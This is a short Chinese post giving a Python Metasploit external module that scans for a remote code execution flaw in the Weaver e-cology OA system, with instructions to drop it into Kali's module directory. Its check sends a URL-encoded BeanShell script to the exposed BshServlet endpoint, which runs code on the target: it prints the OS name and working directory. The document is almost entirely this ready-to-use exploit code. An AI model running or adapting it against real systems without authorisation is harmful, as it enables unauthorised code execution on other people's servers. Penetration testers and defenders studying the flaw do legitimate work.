05-msf的泛微OA-rce扫描模块

写一个泛微 OA 的 scanner（扫描）模块

这是一个 Python 3 模块，使用方法是将它放到 Kali 的对应目录下：/usr/share/metasploit-framework/modules/auxiliary/scanner/http/weaver_e_cology_rce_scanner.py

#!/usr/bin/env python
# Copyright (c) 2003-2018 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#

import json

import requests
import metasploit.module as module

# Module descriptor handed to metasploit.module.run(): a 'single_scanner'
# with one declared option. Values are the same as the original literal,
# only spelled as keyword constructors.
metadata = dict(
    name='weaver e-cology oa system rce',
    description='''weaver e-cology oa system <=9.0 remote code execution''',
    authors=['whale3070'],
    date='2021-02-19',
    license='CORE_LICENSE',
    references=[
        dict(type='url', ref='https://whale3070.github.io/'),
    ],
    type='single_scanner',
    options=dict(
        # Declared as a string; run() reads it back under the key 'RPORT'.
        RPORT=dict(type='string', description='PORT', required=True),
    ),
    notes=dict(AKA=['weaver_e_cology_rce_scanner.py']),
)

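def log(message, level='info'):
    """Emit a JSON-RPC 'message' notification on stdout for the framework.

    The original built the JSON by %-formatting the text into a literal, so a
    message containing a double quote, a backslash or a newline produced an
    invalid document. The envelope is now serialized with json.dumps, which
    escapes such characters.

    Args:
        message: text to display; any str is safe.
        level: framework message level, passed through verbatim (this file
            uses 'info', 'good' and 'warning').
    """
    notification = {
        'jsonrpc': '2.0',
        'method': 'message',
        'params': {'level': level, 'message': message},
    }
    # One JSON document per line, flushed at once, so the framework's reader
    # on the other end of the pipe sees the notification without buffering delay.
    print(json.dumps(notification), flush=True)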

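def single_url(rhost, rport, timeout=5):
    """Probe one host for the BshServlet endpoint and report the result via log().

    Fixes against the original: on Python 3 ``r.content`` is bytes, so the
    ``'getProperty' in r.content`` test raised TypeError (which is not a
    RequestException and escaped the handler); the decoded ``r.text`` is
    checked instead. A failed request is now reported distinctly from a
    reachable-but-unmatched endpoint, and the hard-coded Content-Length
    header is dropped because requests computes it from the body.

    Args:
        rhost: target host name or address.
        rport: target port; formatted with %s, so str (as the framework
            passes it) or int both work.
        timeout: seconds to wait for the HTTP request (default 5, as before).

    Side effects: one HTTP POST to the target and one log() call with level
    'good' (status 200 and marker present), 'warning' (response without the
    marker) or 'error' (request raised a RequestException).
    """
    vuln_url = 'http://%s:%s/weaver/bsh.servlet.BshServlet' % (rhost, rport)
    headers = {
        'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0",
        'Content-Type': "application/x-www-form-urlencoded",
        'Referer': vuln_url,
        'Connection': "close",
    }
    # Request body kept verbatim from the original module.
    payload = r'''bsh.script=print(Interpreter.VERSION);%53%74%72%69%6e%67%20%4f%53%20%3d%20%53%79%73%74%65%6d%2e%67%65%74%50%72%6f%70%65%72%74%69%65%73%28%29%2e%67%65%74%50%72%6f%70%65%72%74%79%28%22%6f%73%2e%6e%61%6d%65%22%29%3b%0d%0a%70%72%69%6e%74%28%4f%53%29%3bpwd()'''
    try:
        resp = requests.post(url=vuln_url, data=payload, headers=headers, timeout=timeout)
    except requests.exceptions.RequestException as exc:
        # Only the exception class name goes into the message so it stays
        # free of quotes and newlines regardless of how log() serializes it.
        log("Request to %s failed (%s)" % (vuln_url, type(exc).__name__), 'error')
        return
    # 'getProperty' is a token of the submitted (URL-encoded) script; presumably
    # the servlet renders the decoded script back in its page. Any page that
    # echoes decoded parameters would match as well, so treat a hit as an
    # indicator rather than proof.
    if resp.status_code == 200 and 'getProperty' in resp.text:
        log("Found weaver e-cology RCE in " + vuln_url, 'good')
    else:
        log("Not found weaver e-cology RCE in " + vuln_url, 'warning')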

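def run(args):
    """Entry point called by metasploit.module.run() with the option values.

    Args:
        args: dict of option values supplied by the framework. The host is
            read under the lowercase key 'rhost' while the declared option
            is read as 'RPORT' — presumably the bridge passes the built-in
            host option lowercased; confirm against the external-module
            protocol before changing either key. A missing key raises KeyError.

    Returns:
        None; the result is reported through log() by single_url().
    """
    # The commented-out key-uppercasing debug loop from the original was removed;
    # it was never executed and no longer documents the intended behavior.
    single_url(args['rhost'], args['RPORT'])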

# Hand control to the framework bridge (metasploit.module.run): it reads the
# JSON-RPC request from stdin and either answers the describe call with
# `metadata` or dispatches the run call to run(args).
if __name__ == '__main__':
    module.run(metadata, run)